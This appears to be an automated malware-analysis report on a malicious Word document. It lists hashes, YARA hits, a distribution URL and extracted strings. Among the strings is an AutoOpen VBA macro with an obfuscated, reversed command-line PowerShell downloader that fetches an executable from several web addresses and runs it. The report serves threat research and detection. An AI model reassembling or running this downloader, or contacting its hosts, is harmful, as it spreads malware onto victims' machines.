Sample details: 5f9902ff90d59b05a6b199c07aba516e --

Hashes
MD5: 5f9902ff90d59b05a6b199c07aba516e
SHA1: 11a4b306f91d2310539f48519eed16d5ce917917
SHA256: 39b303a7f5e7931b7cd4eb39576e35e6f5a9ad139d020ccdbc8d427c1ae49a03
SSDEEP: 768:qpJcaUitGAlmrJpmxlzC+w99NBdQ+1otk3GjRHzn8h5xBN689k92x5o:qptJlmrJpmxlRw99NBdQ+atk3Gtn6kU
Details
File Type: Composite
Yara Hits
YRP/office_document_vba | YRP/Office_AutoOpen_Macro | YRP/Contains_VBA_macro_code | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | FlorianRoth/Office_AutoOpen_Macro |
Source
http://apicecon.com.br/09012NQNFL/ACH/Smallbusiness/
http://apicecon.com.br/09012NQNFL/ACH/Smallbusiness
Strings
		ZYhhklBjGoCsVIwDAOi  
a$	gdJz4
UNICODE
 Compressed by jpeg-recompress
&""&0-0>>T
&""&0-0>>T
mdK%?<y
 "$0234p
rkitNP
yNkl[o
|"J$fb|
Z|&1Vk.
C,*uXt
Q,CT!'
)un$oW
#3BRSb
!AmZ]&54
d.:zM1
?tc&<i
 zM7&v
p[<fu$H 
>uiq[m
yM\lb"
XKZF	:
y8xB6/
k(kEyw
!1AQaq
+LU>j/
:zPpr8aB
nUBa+W
Fita@\K
YU}MR.]8Zh
MH8GZb
b@q$Jo
Qrrz2_
N7DYha
j.dqd5
sE>,8?0
$`35QTt
`NuGWp
a	)M6V
r%%8Qv
jSK7eH+-
 "$1@0236`t
KsOuw,
c&fP"?r
c&fP""
8Xs9b\
2%Ufbl
fV"g15
#03`bqr
`dj)X0
#&%"y:
hY?ZWP
R`H$E[!
[Content_Types].wpP
_LGzv/.LGzv
VsjZU/VsjZU/VsjZUManager.wpP
VsjZU/VsjZU/VsjZU1.wpP
$4vq^W
MB[F7x"
>Yr]H+
a!e9#i
An7jah
VsjZU/VsjZU/_LGzv/VsjZUManager.wpP.LGzv
K(M&$R(.1
[Content_Types].wpPPK
_LGzv/.LGzvPK
VsjZU/VsjZU/VsjZUManager.wpPPK
VsjZU/VsjZU/VsjZU1.wpPPK
VsjZU/VsjZU/_LGzv/VsjZUManager.wpP.LGzvPK
zWZtm version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Normal.dotm
Microsoft Office Word
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\system3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2DF
8D04C-5B
FA-101B-
m Files\@Common
icrosoft
 Shared\
OFFICE16
\MSO.DLL
M 16.0
hdsOBApG
pizBCa
JRqDVjG
Attribut
e VB_Nam
e = "hds
mal.This
Document
VGlobal
ateDeriv
$Customi
1Sub A
utoOpen(
   Dim
 pdYMEp
28860619g
4628 95274I
5645197'@+C
buEVpYG
Shell@
 GEuwUIq
wP + UwJ
BScQFJCk
MVzHbJLa
1KHZnJ
1881825n5
7!. ln
*\CNormalrU
ThisDocument
Project
hdsOBAp
Module1
pizBCaJRqDVj
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB
C:\Windows\system32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
Document
AutoOpen
md /V^:ON/
s^e^t Q^3^d^A=^ ^    
 ^  ^       ^  }}^{h
aer^b^;vA^K^$ me^
tI-ek^ovnI^;)
vA^K^$ ,zZL^$(e^l^iFda^
o^ln^w^o^D^.pl^
q^$^{^yrt^{)R
W^b^$^ 
ni^ ^z^Z^L^$(h
aer^of;'^e^x^e.
^'^+a^JN^$+^'\^'+
b^u^p:vne^$=v^
AK$^;^'0^
7^1^' =^ aJN$;)
^'@^'(ti^l^pS^.^'X/^mo
n^i^s^e^mh
e^tari^w//:^p^t^t
h@j/^t^en^
.^s^s^e
n^l^l^e^w^tr^a//^:p^t^th@
X^Yh/m^o
n^aill^a//^:^p^tt^
h@1^H/r^f.ved-^s^p^pa.ru
^:pt^th@B^o^l^ai
R^l^k/m^
^.^s^uwag//^:
p^tt^h^'=RW^b^$^;tn
beW^.^t^eN
e^j^bo^-^w^en^=p
lq^$^ ^l^le^hsrew^op&&^f
^or /^L %^F ^in (^35^1;
^-1^;^0)^do ^set V
^P=!V^P!!Q^3^d^A:~%^F,1!&&i^
f %^F=^=^0 
a^l^l %V^P:~^-3^5
Attribut
e VB_Nam
e = "piz
BCaJRqDV
tion GEu
wUIqwP()
Dim  SIbYi
O4664p2525
W28641
WjTXXwLi
DForma
t(Chr(15
d /V^:ON\/"
e^t Q^3^
d^A=^ ^
}0}^{h
aer^b^;v
A^K^$ me
tI-ek^
ovnI^;)B
,zZL^$(
e^l^iFda
o^ln^w^
o^D^.pl
q^$^{^yr
t^{)RB
+of;B'
'^+a^JN^
$+^'\^'+GA
^u^p:vne
^$=vC/AK$
^;^'0^
`djvcF
56569568
NQwlRQ
A*`XulBVG
wmQOEW
"7^1^' 
^'(t@,^pS
^.^'X/^m
nC;n^i^
u kari
^w//:^p^
t^t"<h@j/
Iw^tr@^a//^:
X^Yh/m
n^aill
TJzRulf
B?9876(Tb
TtnQ(]
38160540
zz!Eh@1^H
/r^f.ved
0p^pa.r
Cennk?-%-/b
 Zs^puwag
Ft@^h^'=R
BDiwF>wG3
B*3360p2055`(
3535110N1
18`.8692
HnZCmwS
beWP"t^eNM
H_>+ N
^j^bo^-0u
J@e^hsre
vpP&&^f
^L %^F ^
in (^35^$1;
^do ^set
P=!V^HP!!
1!&&iSRf
=^=^02{
:~ ^-3^5
!faEBXz
!6453323
Win64x
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Documentj
hdsOBAp
AutoOpen
pdYMEp
dmuXuF
nQoazG
buEVpYz\
ShellV
GEuwUIqwP
UwJBScQFJCkdRn
jDiXMVzHbJLa
CBQXSF%
TXEtFw
Module1b
pizBCaJRqDVj{
SIbYi3
SzlWUX
jTXXwLiVd
djvcF]/
NQwlRQS
wmQOEW'
JzRulfu
bTtnQF
BDiwFwY
TkIqZm$?
ztmdn=B
HnZCmwS
faEBXz{
ID="{AC52BB76-2B73-4489-92F0-333DBAE503F1}"
Document=hdsOBAp/&H00000000
Module=pizBCaJRqDVj
ExeName32="CpmOIzn"
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="6567B15E73C777C777C777C777"
DPB="CAC81EF982FA82FA82"
GC="2F2DFB64P
05AC6BAD6BAD94"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
hdsOBAp=0, 0, 0, 0, C
pizBCaJRqDVj=25, 25, 1385, 693, 
hdsOBAp
pizBCaJRqDVj
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Normal.dotm
Microsoft Office Word